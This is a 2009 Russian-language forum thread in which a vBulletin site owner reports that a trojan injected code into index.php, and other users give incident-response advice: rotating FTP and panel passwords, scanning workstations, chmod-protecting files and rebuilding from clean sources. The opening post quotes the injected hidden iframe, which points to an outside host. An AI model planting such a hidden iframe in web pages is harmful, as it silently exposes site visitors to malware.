imho.ws |
![]() |
![]() |
![]() |
# 1 |
Junior Member
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Проблема на хостинге: iframe inject
Хотелось бы попросить многоуважаемую публику помочь мне в решении следующей проблемы. После обновления vbulletin с линейки 3.6 на 3.8 наш форум стал выдавать нас следующую ошибку:
Parse error: syntax error, unexpected T_STRING in /usr/home/forum.psifactor.ru/htdocs/index.php on line 482 После проверки кода мы обнаружли что наши файлы были атакованы каким то трояном вставляющим в index.php код следующего содержания: Код HTML:
<iframe src="http://c7h.ru:8080/index.php" width=139 height=193 style="visibility: hidden"></iframe> Мы проверили всё что можно и убедились что скорее всего данный троян сидит гдето на хостинге, однако доказать это провайдеру не представляется возможным. В связи с этим хотелось бы спросить может ли ктото объяснить как нам защитить файлы нашего форума. Заранее спасибо за помощь. Последний раз редактировалось Plague; 08.07.2009 в 21:23. Причина: тег html для кого придумали? |
![]() |
![]() |
# 2 |
Administrator
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
а можно узнать, откуда такая уверенность???
в первую очередь, привет товарищам что пароли фтп хранят где ни попадя. в тотал командере, например. хотя последние его бета-версии (7.5) умеют вроде нормально шифровать. и не он один хранит пароли в таком виде что первый же залетный троян вскрывает их на раз-два. вопрос не по разделу, vb здесь совершенно не причем, переношу в безопасность. Да, кстати, chmod ugo-w на все php файлы спасет по идее. но троя всеже искать надо, это не метод..
![]() |
# 3 |
::VIP::
Хрюндель Регистрация: 27.10.2002
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Не факт!
Тебе правильно подсказали. скорее всего у вас украли пароль от фтп. 1) меняйте срочно все пароли!!!!(фтп, панель управления хостингом ) 2) проверяйте компа на вирусы и желательно в безопасном режиме.
# 5 | |
Administrator
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Цитата:
но это не выход, ребята. VB кстати белый, иль левый? если левый версию говори, скину список файлов с белого. может еще туда кто скрипт левый подсунул.
![]() |
![]() |
# 7 |
Administrator
ну да, там по идее хорошо смотрят за этим делом.
нууу, сам движок я сливать не собираюсь ![]() а список файлов файлов я и здесь положить могу, ничего криминального в этом нет. хотя повторяю, на vbsupport народ толковый, думаю давно бы уж просекли если чего не так бы было. значит проблема на вашей стороне ©
![]() |
# 8 |
Junior Member
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Ещё раз спасибо. Я уже просил на vbsupport помощи. Они меня послали к хостеру и удалили тему. Проблема в том что доказать чтото хостеру нереально. Потому я и ищу альтернативные варианты защиты.
Вот по списку пройдусь теперь. Можно ли сделать чтото ещё? |
![]() |
![]() |
# 9 |
Administrator
есть лечение болезни симптоматическое, а есть лечение полное. вот то что ты ищешь - это есть симптоматическое. и я его уже дважды написал.
первое что нужно сделать, это как уже сказали - поменять пароли фтп, ssh, панели, и нигде их не сохранять (карандаш и бумагу еще никто не отменял). пароли ставить ацкие. типа oeh6IgE_+B^tosX7771b. для всяческих веб панелей юзать firefox, а не насквозь дырявый ИЕ. Следующее что нужно сделать - это не спешить их раздавать если они еще кому-то нужны. и в это время, когда все изменено, смотреть - появится ли снова этот инжект. если нет - начать выдавать поочереди. в первую очередь себе. всмысле сохранить в электронном виде. после кого появится - брать биту и идти к нему в гости, компутер починять. а еще не лишним было бы написать что за хостинг (дед, вдс, web)
![]() |
# 11 |
Administrator
так. если тут и дальше будут испытывать мои телепатические способности, я последую примеру вбсуппорт, честное слово. сколько я еще должен инфу вытягивать??
что за хостинг? Меня не интересует кто его предоставляет, меня интересует техническая информация: dedicated/VDS/Web-hosting? Ось (UNIX/Windows)? ![]()
![]() |
# 12 |
::VIP::
Хрюндель Регистрация: 27.10.2002
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
HOTMAN,
Ещё раз смотрите свои компы. Потом заберите форум на локальную тачку, и проверьте на тему левого кода. Если есть доступ по ssh то clamav проверьте, если там у вас где-то шел висит он его найдет и скажет об этом. Чудес не бывает. Хостер просто даёт место, а вся бойда происходит из под конкретного пользователя. тобиш из под вашего акка.
Если Вас выписали из сумасшедшего дома, это не значит, что Вас вылечили. Просто Вы стали как все. Последний раз редактировалось boor; 22.07.2009 в 15:10. |
![]() |
![]() |
# 13 |
Newbie
![]() |
в аналогичной ситуации когда я обнаружил код iframe inject в файлах своего сайта я тупо пересобрал руками форум + моды к нему из оригинальных дистрибутивов от авторов и залинковал конфиги на старую базу. таким образом у меня была 100% гарантия что сайт чист. не вижу смысла искать изменения, цена пропущенной дыры - повторный взлом сайта.
на тему хостера... 95% что виноваты вы сами и только 5% что действительно был взломан хостер.(не все конторы достаточно чистоплотны в этом вопросе). "Мы проверили всё что можно... " вопрос в том чем вы проверяли. например NOD32 вобще антивирем называть сложно. используйте нормальные антивири, ужесточите политику безопасности на рабочих местах операторов и админа сайта. |
![]() |
![]() |
# 14 |
Guest
|
99% случаев подобных это троян на пк. Ему неважно какой у вас пароль. При соединении он переписывает файл и отправлет такой как ему нужно.
Тотал в этом случае вообще дырявый. Советую сменить пароль и использовать фтп программы которые имеют более высокое качество шифрования пасов (это на случай если троят не будет найден). |
![]() |
# 15 |
Котозавр
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Есть путь гораздо проще, избавляет от кучи проблем - пора завязывать с виндой. Особенно веб-программерам и админам.
# 17 |
Котозавр
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Можно подумать что на каторгу загоняют...
![]() Многие работают в Линуксе и нужды в винде не имеют вообще.